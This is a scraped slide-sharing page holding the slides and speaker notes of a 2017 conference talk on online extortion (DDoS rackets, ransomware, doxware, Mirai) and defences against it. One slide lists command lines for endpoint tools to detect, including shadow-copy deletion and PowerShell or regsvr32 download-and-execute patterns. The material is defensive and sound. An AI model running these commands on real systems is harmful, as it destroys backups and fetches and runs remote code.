IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptxIntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptxfuebf
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DANeil Lines
 

Similar to E-Extortion Trends & Defense Strategies (20)

LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR Overview
 
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a HackerCisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Protecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeProtecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber Crime
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network Security
Network SecurityNetwork Security
Network Security
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRT
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network security
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
 
Compliance made easy. Pass your audits stress-free.
Compliance made easy. Pass your audits stress-free.Compliance made easy. Pass your audits stress-free.
Compliance made easy. Pass your audits stress-free.
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy Li
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakout
 
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptxIntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
 

Recently uploaded

costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 

E-Extortion Trends & Defense Strategies

  • 1. Erik Iker Sr. Incident Response Analyst B-Sides Tampa 2017 e-Extortion Trends & Defense
  • 2. Cisco Confidential 2 Whoami • Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues • 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase • 13 years law enforcement performing digital forensics and computer crime investigations
  • 3. Cisco Confidential 3 Agenda Evolution of extortion and trends Ransomware Defense DDoS & Threat Intel
  • 4. Cisco Confidential 4 Extortion Defined The practice of obtaining something, especially money, through force or threats
  • 6. Cisco Confidential 6 First forays into e-extortion • 2007 FBI release of warning about online extortion mirroring mafia tactics
  • 7. Cisco Confidential 7 DDoS “Protection” Racket
  • 8. Cisco Confidential 8 Armada Collective DHS Warning
  • 9. Cisco Confidential 9 Lizard Squad Gaming DDoS
  • 10. Cisco Confidential 10 Cats Catch Some Mice Again • Early 2016 Interpol coordinated arrests of Armada Collective Members in Australia, and DD4BC members in Bosnia and Herzegovinia
  • 11. Cisco Confidential 11 Copy Cat Profiteering
  • 12. Cisco Confidential 12 Ransom Extends Extortion • Ransom: Payment demanded for the release of a captured person or property
  • 13. Cisco Confidential 13 Data Breach Response Phishing • Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
  • 14. Cisco Confidential 14 Data Breached for Ransom
  • 15. Cisco Confidential 15 Ransomware Scams That Can’t Decrypt http://www.welivesecurity.com/2017/01/05/killdisk- now-targeting-linux-demands-250k-ransom-cant- decrypt/ http://blog.talosintel.com/2016/07/ranscam.html
  • 16. Cisco Confidential 16 Ransom Hits Home • Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left. • Completely unable to be recovered, EVEN IF YOU PAY
  • 17. Cisco Confidential 17 The Gift That Keeps Giving • In January, Cisco Talos researchers found new variants of Locky also deliver Kovter click fraud Trojan • http://blog.talosintel.com/2017/01/locky-struggles.html
  • 18. Cisco Confidential 18 E-Extortion Trifecta • Doxware brings all the extortion tactics into one, and is becoming more mainstream: • Encryption • Exfiltration • Extortion demands • Public Data Leak
  • 19. Cisco Confidential 19 What We Know So Far • History Repeats itself with the cat-and-mouse game, and innovation of the mice – We have to be ready for the next evolution of threats • Getting to know your enemy can keep you from paying out to imposters – We need to gain intelligence about our threats • Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts? – Let’s be prepared to defend ourselves and maintain business continuity plans
  • 20. Cisco Confidential 20 Ransom? • “Without a hostage, there is no ransom. That’s what a ransom is.” - The rules according to Walter Sobchak
  • 21. Cisco Confidential 21 Backups – Offline if Possible • CryptoFortress – encrypting unmapped shares • SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
  • 22. Cisco Confidential 22 System Hardening • Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it • If you can’t remove PS, disable ISE and REPL ability • Application whitelisting • Change default network options for NoSQL • bind 127.0.0.1 instead of 0.0.0.0 • Change default ports to custom config to stifle script kiddies • https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for- ransom • Restrict IP ranges that can access your NoSQL Instance • Implement security group for cloud instances • http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
  • 23. Cisco Confidential 23 Endpoint Solutions • Able to review for heuristic patterns of binaries being called, and review command line parameters such as: • “Vssadmin.exe delete shadows /all /quiet del /f /q %0” • “rundll32.exe C:Users$usernameAppDataLocalTemp” • “rundll32.exe javascript:”mshtml,RunHTMLApplication<script execution stuff>.RegRead(”HKCU<specific registry path>”) “ will interpret in the command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in memory” • “regsvr32.exe /s /u /i:< ^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w- .]+[^#?s]+)(.*)?(#[w-]+)?$ > scrobj.dll • “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString : “^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-.]+[^#?s]+)(.*)?(#[w-]+)?$ ’)" • “Maliciousbinary.exe %windir%system32....%smstc.exe”
  • 24. Cisco Confidential 24 Ransomware Decryptors • https://www.nomoreransom.org/ • http://www.talosintelligence.com/teslacrypt_tool/
  • 25. Cisco Confidential 25 What About Things That Aren’t Ransomware? neeson_speech1
  • 26. Cisco Confidential 26 One DDoS Does Not Fit All • Volume Based Attacks – Goal is to overload bandwidth – UDP flood, ICMP floods (Bits per second) • Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (Packets per second) • Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris - creating connections with only partial requests to leave connection open (requests per second)
  • 27. Cisco Confidential 27 Mirai • Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS • Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation • Baby Monitors and CCTV cameras responsible for high profile attacks • Using dictionary of ~60 weak passwords (less than the Morris
  • 29. Cisco Confidential 29 DDoS Game Plan • Be able to detect DDoS before network is inaccessible, or systems are crashing using NetFlow, system resource, and Firewall traffic monitoring dashboards • Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship • Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
  • 32. Cisco Confidential 32 Intel Feeds and Community Membership • ISACs o msisac.cisecurity.org o fsisac.com o r-cisc.org • Malware sharing - www.misp-project.org • MITRE Threat Intel Project - https://crits.github.io/ • Tons of paid vendor feeds
  • 33. Cisco Confidential 33 Use Your Phishing Quarantine Data
  • 34. Cisco Confidential 34 Thanks • Twitter - @ErikIkerFW • LinkedIn - www.linkedin.com/in/erikiker

Editor's Notes

  1. Extortion threats and vulnerabilities were easier to gauge in the prior to the beginnings of e-extortion
  2. Mafia-style extortion had some drawbacks, mainly due to easier attrition, and law enforcement action. Through the entire life of extortion, the cat and mouse evolution stays the same though
  3. As with all things, everything old is new again. This threat resurfaced in 2013 without much change, in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
  4. History repeats itself in 2015 when the real armada collective causes harm to many email and financial institutions. The warning by DHS shows that there was a small DDoS attack, show of power, followed by an email demand for payment.
  5. Lizard Squad received much media attention for it’s DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter They also chose to stop their Christmas, 2014 DDoS of the Xbox network after Kimdotcom agreed to pay them in megaupload vouchers so he could play Destiny
  6. After Armada Collective was arrested, this group sent phish emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn't’t take a costly Threat Intel feed to google the DHS alert to know how the real group operated differed. All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up to Phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
  7. Adult Friend Finder, Brazzers, Ashley Madison, Penthouse, YouPorn, Fur Affinity
  8. We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of ransom. With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined Ransomware with information stealing malware, to exfiltrate encrypted files, and then sell the data online if ransom not paid, or even if it is.
  9. Ranscam differs from other ransomware families like Locky, Cryptolocker, Cerber etc, because even if you pay, they do not release your files. Definitely good to know if you will be paying for nothing. Will be interesting to see how this changes the underground economy of ransomware. Newer variant is Linux Killdisk. Demanding $250k
  10. Victor Gevers Sec Res. Started noting Mongo DB being deleted Dec 26, 2016. Expanded to others. Scriptable Actions, no recovery possible Sigaint email addresses are in multiple campaigns
  11. Even after files released on Locky payment, infection can remain
  12. Combining Pony credential stealing with ransomware. Becoming more prevalent since Oct 2016, reported on by https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
  13. Big Lebowski. Found Bunny Lebowski went home, and the Germans kept trying to get the ransom money. WTF Walter said. Those are the rules. Is he the only one who cares about the rules If we can keep ransomware from having any effect, then there is no ransom at all. Next slides discuss how.
  14. Offline backups need emphasized with new ransomware variant CryptoFortress discovered in March 2016 seeking SMB paths not even mapped. Samas targeting backup servers. Have you tried to recover from those backups and seen if you process and backup style/age is conducive to it Changes to PSEXEC key, terminal server key, PuTTY key
  15. Disable ports and services not needed Eliminate powershell if not needed Disable REPL or ISE if powershell needed Use VPS secure groups https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
  16. Visibility to new MD5 on system, new services, scheduled jobs, registry key changes Putty, terminal services, psexec keys etc
  17. Application Whitelisting – alternatively limit executables to run only from certain paths Disable unneeded ports and services (HTTP etc) Defined roles on network shares with least privilege for user access Privileged Account Management If machines/shares are affected, is there a plan for continuity, to segment that machine, and route traffic around, or go to paper?
  18. Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets, Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  19. Baby Monitors – DynDNS attack CCTV cameras – Krebs attack
  20. Lizard squad also innovated with DDoS as a Service where anyone with a bitcoin or two could lease their power to shut down any site they wanted. Recent Arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
  21. Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets, Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  22. To not be one of the statistics in the $100,000 paid in BTC to Armada Collective Imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google. Both perfectly good sources of Intel. A solid list of infosec leaders being followed on Twitter can be a great early warning system
  23. Following the money might not be for everyone, but law enforcement are now able to track transactions of Bitcoin and track them all the way to the wallets. These type tools are also increasingly being used by financial institutions who need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million has been paid out to ransomware in Q1 and Q2 2016 You can see if others are paying to the wallet from your issue. If not, maybe it is targeted?
  24. Collage of Threat Intel Vendors, discussion of CIM, STIX, TAXI and integration
  25. Visualize Your own logs from Phishing campaigns, bucketing for work groups, M&A activity, projects people are on. Collecting data for who the recipients are for phishing emails can begin to show you relationships, especially if you use a visualization tool such as i2 analysts notebook, Splunk, or on the free side, an ELK stack. Are there common recipients between campaigns, does this happen often, are they in the same workgroup, are they working on a deal with the same external customer, could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends. This can be valuable not only for real phishing, but for phishing training to know what your employees are more susceptible to